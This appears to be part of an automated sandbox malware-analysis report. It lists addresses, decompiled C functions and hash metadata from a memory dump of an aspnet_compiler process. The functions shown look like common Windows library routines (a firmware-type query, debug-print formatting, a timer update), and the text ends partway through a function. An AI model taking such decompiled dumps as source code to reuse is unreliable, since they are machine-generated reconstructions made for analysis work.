0x0130e5a0
0x0130e5a6
0x0130e61d
0x0130e61d
0x0130e621
0x0130e623
0x0130e630
0x0130e630
0x0130e7e6
0x0130e7eb
0x0130e7ed
0x0130e7f4
0x0130e7fa
0x0130e7ff
0x0130e7ff
0x0130e80a
0x0130e812
0x0130e812
0x0130e5ab
0x0130e5b4
0x0130e5b9
0x0130e5be
0x0130e5c0
0x0130e5c2
0x0130e5c8
0x0130e5c9
0x0130e5cb
0x0130e5cc
0x0130e5d5
0x0130e5e4
0x0130e5f1
0x0130e5f8
0x0130e5f8
0x0130e5d5
0x0130e602
0x0130e616
0x0130e63d
0x0130e644
0x0130e64d
0x0130e652
0x0130e657
0x0130e659
0x0130e65b
0x0130e661
0x0130e662
0x0130e664
0x0130e665
0x0130e66e
0x0130e67d
0x0130e68a
0x0130e691
0x0130e691
0x0130e66e
0x0130e6b0
0x00000000
0x0130e6b6
0x0130e6bd
0x0130e6c7
0x0130e6d7
0x0130e6d9
0x0130e6db
0x0130e6de
0x0130e6e3
0x0130e6f3
0x0130e6fc
0x0130e700
0x0130e700
0x0130e704
0x0130e70a
0x0130e70a
0x0130e713
0x0130e716
0x0130e719
0x0130e720
0x0130e761
0x0130e76b
0x0130e774
0x0130e77a
0x0130e77a
0x0130e78a
0x0130e791
0x0130e799
0x0130e79b
0x0130e79f
0x0130e7aa
0x0130e7c0
0x0130e7ac
0x0130e7b2
0x0130e7b9
0x0130e7b9
0x0130e7c7
0x0130e806
0x00000000
0x0130e7c9
0x0130e7d1
0x0130e7d8
0x00000000
0x0130e7d8
0x00000000
0x00000000
0x0130e722
0x0130e72e
0x0130e748
0x0130e74c
0x0130e754
0x0130e756
0x0130e75c
0x0130e75c
0x00000000
0x0130e75c
0x0130e758
0x0130e758
0x00000000
0x0130e758
0x0130e750
0x00000000
0x00000000
0x0130e752
0x00000000
0x0130e752
0x0130e730
0x0130e735
0x0130e73d
0x0130e73f
0x00000000
0x00000000
0x0130e741
0x0130e741
0x00000000
0x0130e741
0x0130e739
0x00000000
0x00000000
0x0130e73b
0x00000000
0x0130e73b
0x0130e722
0x0130e720
0x0130e6b0
0x0130e618
0x00000000
0x0130e618

Strings

`, xrefs: 0130E670
`, xrefs: 0130E5D7

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 7766fc7ef94d8b43926fa98dda43ea220f2c15d6de02c49043f42e0bdf9c8142
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7F918F713043469BE726CE29C851B2BBBE5AF84B28F148D2DF695CB2C0E774E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012C51BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012C51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13205f0);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012C53CA(0);
						return E0129D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0128F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01263690(1, _t117, 0x1221810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0128AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01264620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0128AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E012C500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01289860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x012c51be
0x012c51c3
0x012c51c8
0x012c51cd
0x012c51d0
0x012c51d3
0x012c51d8
0x012c51db
0x012c51de
0x012c51e0
0x012c51e3
0x012c51e6
0x012c51e8
0x012c5342
0x012c5351
0x012c5356
0x012c535a
0x012c5360
0x012c5363
0x012c5366
0x012c5369
0x012c5369
0x012c536b
0x012c536b
0x012c5370
0x012c53a3
0x012c53a4
0x012c53a6
0x012c53ab
0x012c53ab
0x012c53ae
0x012c53ae
0x012c53b5
0x012c53bf
0x012c53bf
0x012c5375
0x012c5396
0x012c53a0
0x012c53a0
0x00000000
0x012c5396
0x012c5377
0x012c5379
0x012c537f
0x012c538c
0x012c5390
0x00000000
0x012c5390
0x012c51ee
0x012c51f1
0x012c5301
0x012c5310
0x012c5315
0x012c5318
0x012c531b
0x012c5320
0x012c532e
0x012c5331
0x00000000
0x012c5331
0x012c5328
0x012c5329
0x00000000
0x012c5329
0x012c51fa
0x012c5235
0x012c5236
0x012c5239
0x012c523f
0x012c5240
0x012c5241
0x012c5242
0x012c5246
0x012c5247
0x012c524e
0x012c5251
0x012c5267
0x012c5269
0x012c526e
0x012c527d
0x012c527e
0x012c5281
0x012c5282
0x012c5287
0x012c5288
0x012c528a
0x012c528f
0x012c5294
0x00000000
0x00000000
0x012c529a
0x012c529c
0x012c529e
0x012c529e
0x012c52a4
0x012c52b0
0x00000000
0x00000000
0x012c52ba
0x012c52bc
0x012c52bc
0x012c52d4
0x012c52d9
0x012c52dc
0x012c52e1
0x00000000
0x00000000
0x012c52e7
0x012c52f4
0x00000000
0x012c52f4
0x012c5270
0x00000000
0x012c5270
0x012c51fc
0x012c51fd
0x012c5202
0x012c5203
0x012c5205
0x012c520a
0x012c520f
0x00000000
0x00000000
0x012c521b
0x012c5226
0x012c522b
0x012c521d
0x012c521d
0x012c5222
0x012c5222
0x012c522d
0x00000000

Strings

Legacy, xrefs: 012C5226
UEFI, xrefs: 012C521D

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction ID: 5334c765b43bd13299fb7f36f394f5836f1871cc12878e319d3d36557c86e42a
Opcode Fuzzy Hash: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction Fuzzy Hash: 5E518171A606199FDB15DFA8C880AADBBF9FF44B00F14412DE649EB291DA71E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0124B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0124B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x131f7a8);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0129D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0128D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0128F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0129DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0128B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0128B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0128E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0128A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0124b171
0x0124b171
0x0124b171
0x0124b171
0x0124b171
0x0124b176
0x0124b17b
0x0124b180
0x0124b186
0x0124b18f
0x0124b198
0x0124b1a4
0x0124b1aa
0x012a4802
0x012a4802
0x012a4805
0x012a480c
0x012a480e
0x0124b1d1
0x0124b1d3
0x0124b1de
0x0124b1de
0x012a4817
0x012a481e
0x012a4820
0x012a4822
0x012a4822
0x012a4824
0x012a4824
0x012a482a
0x00000000
0x00000000
0x012a4835
0x012a483a
0x012a483d
0x012a483f
0x012a4842
0x012a4842
0x012a4842
0x012a4846
0x012a484c
0x012a484e
0x012a4851
0x012a4851
0x012a4853
0x012a4854
0x012a4854
0x012a4858
0x012a485a
0x012a485a
0x012a485d
0x012a485f
0x012a4861
0x012a4861
0x012a4866
0x012a486b
0x012a486e
0x012a4871
0x012a4876
0x012a4876
0x012a4878
0x012a487b
0x012a4884
0x012a4884
0x00000000
0x012a487d
0x012a487d
0x012a4882
0x012a4889
0x012a4889
0x012a488f
0x012a4891
0x012a48e0
0x012a48e2
0x012a48e4
0x012a48e4
0x012a48e7
0x012a48e7
0x012a48ed
0x012a48f4
0x012a48f6
0x012a4951
0x012a4951
0x012a4953
0x012a4953
0x012a4956
0x012a4956
0x012a4958
0x012a4959
0x012a4959
0x012a495d
0x012a495d
0x012a495f
0x012a495f
0x012a4965
0x012a4969
0x012a49ba
0x012a49ba
0x012a49c1
0x012a49c5
0x012a49cc
0x012a49d4
0x012a49d7
0x012a49da
0x012a49e4
0x012a49e5
0x012a49f3
0x012a4a02
0x00000000
0x012a4a02
0x012a4972
0x012a4974
0x00000000
0x00000000
0x012a4976
0x012a4979
0x012a4982
0x012a4983
0x012a4984
0x012a498b
0x012a498d
0x012a4991
0x012a4993
0x012a4999
0x012a499d
0x012a49a2
0x012a49a2
0x012a49a2
0x012a4999
0x012a49ac
0x00000000
0x012a49b3
0x012a48f8
0x012a48fe
0x00000000
0x00000000
0x00000000
0x012a48fe
0x012a4895
0x012a489c
0x012a48ad
0x012a48b2
0x012a48b5
0x012a48b7
0x012a48ba
0x012a48bc
0x012a48c6
0x012a48c6
0x012a48cb
0x012a48d1
0x012a48d4
0x012a48d8
0x012a48d8
0x00000000
0x012a48d8
0x012a48be
0x012a48c0
0x00000000
0x00000000
0x012a48c2
0x00000000
0x00000000
0x00000000
0x012a48c4
0x00000000
0x012a4882
0x012a487b
0x012a4904
0x012a4906
0x00000000
0x00000000
0x012a4908
0x012a490e
0x00000000
0x00000000
0x012a4910
0x012a4917
0x012a4917
0x00000000
0x012a4917
0x0124b1ba
0x012a47f9
0x012a47fc
0x00000000
0x00000000
0x00000000
0x012a47fc
0x0124b1c0
0x0124b1c0
0x0124b1c3
0x0124b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 012A48AD

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction ID: c9c5f5be8ae9b64fd9be817ec1e9dee06a8ebe36109f87a3f7e97e5f49c8456f
Opcode Fuzzy Hash: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction Fuzzy Hash: 6451F471D2029A8FDF35EF68C845BBEBBB0BF00710F5841ADD9599B282D7B08945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0126B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0126B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x133d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01267D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01318CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01289E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0128B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0128CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01267D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01318F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0128AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1338628; // 0x0
								_v68 = _t77;
								_t78 =  *0x133862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1338628; // 0x0
							_t116 =  *0x133862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0126b94c
0x0126b956
0x0126b95c
0x0126b95e
0x0126b964
0x0126b969
0x0126b96d
0x0126b96d
0x0126b970
0x0126b974
0x0126b97a
0x0126badf
0x0126badf
0x0126bae2
0x0126bae4
0x0126bae6
0x0126baf0
0x012b2cb8
0x0126baf6
0x0126baf6
0x0126baf6
0x0126bafd
0x0126bb1f
0x0126bb1f
0x0126baff
0x0126bb00
0x0126bb00
0x0126bb03
0x0126bb03
0x0126bacb
0x0126bacf
0x0126bad0
0x0126bad1
0x0126badc
0x0126badc
0x0126b980
0x0126b980
0x0126b988
0x0126b98b
0x0126b98d
0x0126b990
0x0126b993
0x0126b999
0x0126b99b
0x0126b9a1
0x0126b9a5
0x0126b9aa
0x0126b9b0
0x0126b9bb
0x0126b9c0
0x0126b9c3
0x0126b9ca
0x0126b9cc
0x0126b9cf
0x0126b9d3
0x0126b9d7
0x0126ba94
0x0126ba94
0x0126ba98
0x0126baa3
0x012b2ccb
0x0126baa9
0x0126baa9
0x0126baa9
0x0126bab1
0x012b2cd5
0x012b2cdd
0x012b2cdd
0x0126babb
0x0126babc
0x0126bac2
0x0126bac3
0x0126bac3
0x0126bac6
0x00000000
0x0126b9dd
0x0126b9dd
0x0126b9e7
0x0126b9e7
0x0126b9ec
0x0126b9ec
0x0126b9f1
0x0126b9f5
0x0126b9fa
0x0126ba00
0x0126ba0c
0x0126ba10
0x0126ba10
0x0126ba12
0x0126ba18
0x00000000
0x00000000
0x0126bb26
0x0126bb26
0x0126ba1e
0x0126ba1e
0x0126ba23
0x0126ba25
0x0126ba2c
0x0126ba30
0x0126ba35
0x0126ba35
0x0126ba41
0x0126ba46
0x0126ba4c
0x0126ba50
0x0126ba54
0x0126ba6a
0x0126ba6e
0x0126ba70
0x0126ba74
0x0126ba78
0x0126ba7a
0x0126ba7c
0x0126ba8e
0x0126ba90
0x0126ba92
0x0126bb14
0x0126bb14
0x0126bb16
0x0126bb16
0x00000000
0x0126ba7c
0x0126bb0a
0x0126bb0d
0x00000000
0x00000000
0x00000000
0x0126bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0126B9A5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction ID: 61e54bf8afac89f4e2559bb7909fcee3cd944b5d7c79ab8ef2c6fe742d633671
Opcode Fuzzy Hash: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction Fuzzy Hash: B1514A71629342CFC720DF29C08092ABBE9FB88654F14496EFA95C7395D771EC84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01272581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E01272581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				void* _t245;
				void* _t247;
				signed int _t254;
				signed int _t256;
